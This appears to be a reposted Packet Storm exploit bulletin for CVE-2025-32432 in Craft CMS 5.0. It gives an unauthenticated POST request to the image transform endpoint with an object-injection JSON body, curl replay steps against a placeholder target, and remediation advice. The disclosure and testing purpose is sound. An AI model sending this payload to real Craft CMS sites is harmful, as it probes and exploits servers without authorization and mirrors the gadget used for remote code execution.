Craft CMS 5.0 Logic Flaw (PACKETSTORM:212538)
Posted 2025-12-08 on zero redgem: https://zero.redgem.net/?p=29329
Source: https://packetstorm.news/files/id/212538/ (download: https://packetstorm.news/download/212538)
Published: 2025-12-08 | Type: packetstorm | Bulletin family: exploit | CVE: CVE-2025-32432
CVSS 3.1: 10.0 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

=============================================================================================================================================
| # Title     : Craft CMS 5.0 Image Transform Authentication Logic Flaw
| # Author    : indoushka
| # Tested on : Windows 11 Fr (Pro) / browser: Mozilla Firefox 145.0.1 (64 bits)
| # Vendor    : https://craftcms.com
=============================================================================================================================================

POC :

[+] Description

    A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker
    to trigger backend processing without prior authentication. While the original
    Metasploit module targeted RCE (https://packetstorm.news/files/id/190728/, CVE-2025-32432),
    this PoC does *not* execute code, does *not* write files, and does *not* inject
    payloads. It only proves that the endpoint performs internal logic operations
    without authentication.

# Vulnerability Class
Authentication Bypass → Pre-Auth Backend Processing

# Impact
An attacker can:
- Trigger image transformation logic without logging in.
- Interact with backend components not intended for anonymous users.
- Validate the presence of the vulnerability safely without RCE.

=====================================================================
POC :
=====================================================================

Request :
--------
POST /index.php?p=actions/assets/generate-transform HTTP/1.1
Host: TARGET
Content-Type: application/json

{
  "assetId": 1,
  "handle": {
    "width": 100,
    "height": 100,
    "as test": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        { "itemFile": "/dev/null" }
      ]
    }
  }
}

Effect :
--------
- The server processes the transform request.
- The endpoint responds with a JSON transformation result.
- This demonstrates the pre-auth processing weakness.
- No execution, no payload, no harmful operations.

=====================================================================
How to Save & Use the PoC :
=====================================================================

1. Save the request into a file named:
   craftcms_pre_auth_poc.txt

2. Use curl to replay the PoC (legal environments only):
   curl -X POST \
     -H "Content-Type: application/json" \
     -d @craftcms_pre_auth_poc.txt \
     https://TARGET/index.php?p=actions/assets/generate-transform

3. Expected safe behavior:
   The server processes the request and responds with JSON even though
   the attacker is not authenticated.

4. Tools that can import the PoC:
   - Burp Suite Repeater
   - OWASP ZAP
   - Postman Raw HTTP

=====================================================================
# Recommendation
- Require authentication on all asset transformation endpoints.
- Validate input types before passing them to backend behavior handlers.
- Apply the vendor patch immediately once available.

=====================================================================
# Disclosure Timeline
- Original discovery: Orange Cyberdefense CSIRT
- Educational safe PoC adaptation: indoushka
- Status: Safe demonstration (no execution)
=====================================================================
Greetings to :
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
=====================================================================